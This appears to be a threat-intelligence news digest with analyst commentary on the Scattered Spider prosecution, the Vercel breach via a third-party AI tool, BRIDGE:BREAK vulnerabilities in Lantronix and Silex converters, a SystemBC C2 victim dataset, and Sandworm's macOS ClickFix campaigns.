Vercel OAuth Chain Gains State Attribution: Lazarus, Storm-2372, UNC5537 Join Scattered Spider; CALENDAR + Trivy KEV in Scope

First Guilty Plea from November 2024 Scattered Spider Indictment — Tyler Buchanan ('Tylerb')

Tyler Robert Buchanan (handle: 'Tylerb'), 24, pleaded guilty to wire fraud conspiracy and aggravated identity theft covering SMS phishing campaigns from summer 2022 that compromised at least a dozen major technology companies and enabled tens of millions in cryptocurrency theft from investors. This is the first guilty plea from the five-defendant indictment unsealed by DOJ in November 2024, making it the most significant legal milestone in the Scattered Spider prosecution to date. Krebs on Security provides the richest public account, including Buchanan's specific handle and operational role.

Four co-defendants from the November 2024 indictment remain unresolved — whether they are contesting charges or outstanding warrants will affect the timeline of any cooperation intelligence. The fact that Buchanan's plea covers activity through April 2023 while Scattered Spider operations have continued actively since (including the concurrent Vercel breach) underscores that prosecution of this cohort has not degraded the group's broader operational capability.

Buchanan's plea covers activity through April 2023; Scattered Spider was executing against Vercel mid-plea. That is the entire story about The Com's structure — decentralised, pseudonymous, no single node whose prosecution degrades cohort capability. Cooperation terms, if any exist, are the piece to watch; the four unresolved co-defendants from the same indictment are the second. Stories 6777 and 6587 cover the same event at lower fidelity.

Vercel Confirms Third-Party AI Tool as Entry Vector; Attacker Threatens Cascading Supply-Chain Attacks via Owned JS Libraries

Vercel disclosed an intrusion traced to a third-party AI tool installed on an employee device — a trusted relationship (T1199) entry vector that bypassed Vercel's own perimeter controls entirely. The threat actor, initially attributed to Scattered Spider, claimed possession of internal databases and multiple employee account credentials, and explicitly threatened cascading supply chain attacks via Vercel-owned libraries, including at least one already integrated into major downstream JavaScript projects. The Record's coverage confirms the basic incident timeline but is thin on technical specifics, consistent with an investigation still in early stages at time of publication.

The 'third-party AI tool' framing is deliberately vague — this is characterization for a live investigation under legal scrutiny. The operationally significant structural failure is identical to the UNC5537/Snowflake campaign pattern: employee-installed, presumably unblocked tooling serving as the entry point into cloud credential stores. Whether the AI tool was the actual breach vector or a cover story for a more complex initial access path will matter for downstream detection work.

The structural failure — employee-installed unblocked tooling as cloud-credential entry — is the UNC5537/Snowflake pattern rerun with AI tooling as the new unmanaged client. The explicit downstream threat against Vercel-owned JS libraries is the part worth modelling concretely: Next.js and SWC are the obvious targets, and any build pulling from Vercel-hosted infra during the compromise window inherits the exposure.

BRIDGE:BREAK: 22 CVEs in Lantronix and Silex Serial-to-IP Converters, One Exploit Live Since 2015

Security research branded 'BRIDGE:BREAK' has disclosed 22 vulnerabilities across Lantronix and Silex serial-to-IP converter product lines, with approximately 20,000 devices estimated to be internet-exposed. CVE-2015-5621 is the most immediately actionable finding: EPSS 0.178, a known exploit available at EDB-45547, and a decade of patching inaction on what is now weaponized-available research. The 2025–2026 vintage CVEs (CVE-2025-67034 through CVE-2026-32965) are newly disclosed across the disclosure set with no exploit code and sub-0.001 EPSS, but their presence in internet-facing OT bridge devices changes the risk calculus regardless of score.

Serial-to-IP converters are the connective tissue between legacy serial-bus OT equipment and IP networks — compromise grants bidirectional access to both the IP network and the serial-connected industrial devices downstream. CVE-2015-5621 being exploit-available on 20,000 internet-exposed industrial devices in 2026 is the actual story here; the fresh 2026 CVEs are operationally secondary until weaponization materializes. Per our standard ICS posture, CVSS/EPSS are secondary signals for network-edge OT gear — any Lantronix DeviceLinx or Silex SX-series exposure on your network edge should be treated as priority regardless of score.

CVSS/EPSS are the wrong instruments on OT bridge devices — these are the connective tissue between IP and serial-bus industrial gear, and compromise is bidirectional lateral movement by design. The 2015 exploit-available-on-20k-internet-exposed figure is the actionable number; the 2025–2026 CVE set is secondary until weaponised. If Lantronix DeviceLinx or Silex SX-series sit anywhere on the edge, they need eyes regardless of score.

SystemBC C2 Compromise Spills 1,570-Victim Dataset Across Akira, Cl0p, INC Ransom, and Qilin

A compromised SystemBC C2 server attributed to an operation dubbed 'The Gentlemen' has yielded a victim database of 1,570+ entries spanning four active ransomware operations: Akira, Cl0p, INC Ransom, and Qilin. SystemBC is a well-established proxy/backdoor widely deployed by ransomware affiliates for C2 obfuscation and persistence, and its concurrent use across four named operations from a single infrastructure node suggests shared affiliate relationships or a common IAB supplying multiple gangs simultaneously rather than four independent campaigns. The Cl0p presence is specifically relevant to financial services given that group's demonstrated pattern of exploiting managed file transfer vulnerabilities (MOVEit, GoAnywhere) at scale.

The analytical signal here is the multi-gang infrastructure overlap from a single C2 node, which reflects contemporary ransomware affiliate market dynamics: the same individuals routinely operate across multiple RaaS programs, and their infrastructure overlaps accordingly. The 1,570-victim dataset's intelligence value decays rapidly as gangs cycle C2 infrastructure — the question is whether this has already been actioned by LE or researchers and whether affected organizations have been notified, which the current coverage doesn't establish.

Four active RaaS programs operating out of one SystemBC node is the contemporary affiliate-market signal made unusually legible — shared IAB feed or overlapping affiliate rosters, take your pick, both conclusions are uncomfortable. Cl0p's presence matters specifically because the group's MFT-appliance playbook (MOVEit, GoAnywhere) is the threat model that keeps regulated-data workloads awake. Victim-list intel perishes quickly as gangs cycle infrastructure; the structural read outlasts the IOCs.

Sandworm Adopts macOS ClickFix for Credential and Wallet Stealers — Same Playbook as Lazarus This Cycle

Sandworm Team is running macOS-targeted ClickFix attacks delivering AppleScript-based credential and cryptocurrency wallet stealers. The delivery chain mirrors the Lazarus 'Mach-O Man' kit reported in this morning's digest — same platform, same social-engineering primitive, same target class (developer and DevOps macOS fleets and crypto-adjacent users), landing inside the same 24-hour window from an unrelated state-adjacent crew.

Cross-actor adoption on this timescale moves ClickFix-on-macOS out of the novelty column and into standard tradecraft. GRU and RGB converging on the same macOS delivery primitive on the same day is not coincidence — it's ambient technique diffusion catching up to a platform that finally has enough high-value endpoints to justify the investment. Detection engineering on ClickFix should generalise to macOS immediately if it hasn't already.